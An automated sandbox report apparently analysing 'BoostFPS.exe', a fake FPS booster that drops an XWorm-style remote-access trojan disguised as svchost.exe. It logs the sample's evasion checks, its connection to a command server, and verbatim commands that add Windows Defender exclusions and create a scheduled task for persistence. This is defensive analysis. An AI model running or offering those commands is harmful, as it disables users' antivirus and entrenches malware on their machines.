                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                  Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: svchost.exe, 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                  Source: BoostFPS.exe, 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, svchost.exe.0.dr Binary or memory string: SBIEDLL.DLL?D13JRXWBGEAAD3U7QWDS0OOYDM8W0XB?SAZ1G0CN6L1C0ROTYF1S05WCJYEA3HF
                  Source: C:\Users\user\Desktop\BoostFPS.exe Memory allocated: 610000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\BoostFPS.exe Memory allocated: 1A4E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: BD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1A5A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: B90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1290000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 2CB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1ACB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 31A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1B1A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 2600000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1A600000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\BoostFPS.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Window / User API: threadDelayed 4062
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Window / User API: threadDelayed 5767
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6100
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3569
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6430
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3137
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7244
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2322
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6280
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3270
                  Source: C:\Users\user\Desktop\BoostFPS.exe TID: 2520 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 6624 Thread sleep time: -36893488147419080s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488 Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116 Thread sleep count: 6430 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3292 Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5476 Thread sleep count: 3137 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2884 Thread sleep count: 7244 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2884 Thread sleep count: 2322 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128 Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684 Thread sleep count: 6280 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508 Thread sleep count: 3270 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4912 Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5492 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5028 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2724 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\BoostFPS.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: svchost.exe, 00000004.00000002.3321389821.000000001C600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf7f11d
                  Source: svchost.exe.0.drBinary or memory string: vmware
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_00007FF848DA7A81 CheckRemoteDebuggerPresent, 4_2_00007FF848DA7A81
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\BoostFPS.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 45.141.27.248 7777
Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 208.95.112.1 80
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\Desktop\BoostFPS.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" "
Source: C:\Users\user\Desktop\BoostFPS.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com Mode 100,25
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Source: svchost.exe, 00000004.00000002.3313721624.000000000260A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.000000000264F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: svchost.exe, 00000004.00000002.3313721624.000000000260A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.000000000264F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: svchost.exe, 00000004.00000002.3313721624.000000000260A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.000000000264F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: svchost.exe, 00000004.00000002.3313721624.000000000260A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.000000000264F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: svchost.exe, 00000004.00000002.3313721624.000000000260A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3313721624.000000000264F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2
Source: C:\Users\user\Desktop\BoostFPS.exe | Queries volume information: C:\Users\user\Desktop\BoostFPS.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\BoostFPS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: svchost.exe, 00000004.00000002.3306505266.0000000000677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3323919108.000000001C6BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.BoostFPS.exe.250c800.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.svchost.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BoostFPS.exe.251fc40.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3313721624.00000000025EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BoostFPS.exe PID: 5252, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7160, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 0.2.BoostFPS.exe.250c800.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.svchost.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BoostFPS.exe.251fc40.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3313721624.00000000025EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BoostFPS.exe PID: 5252, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7160, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
MITRE ATT&CK matrix. Entries prefixed with a number are the techniques the analysis matched (the number is the report's badge); the remaining entries are the matrix's default placeholders.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
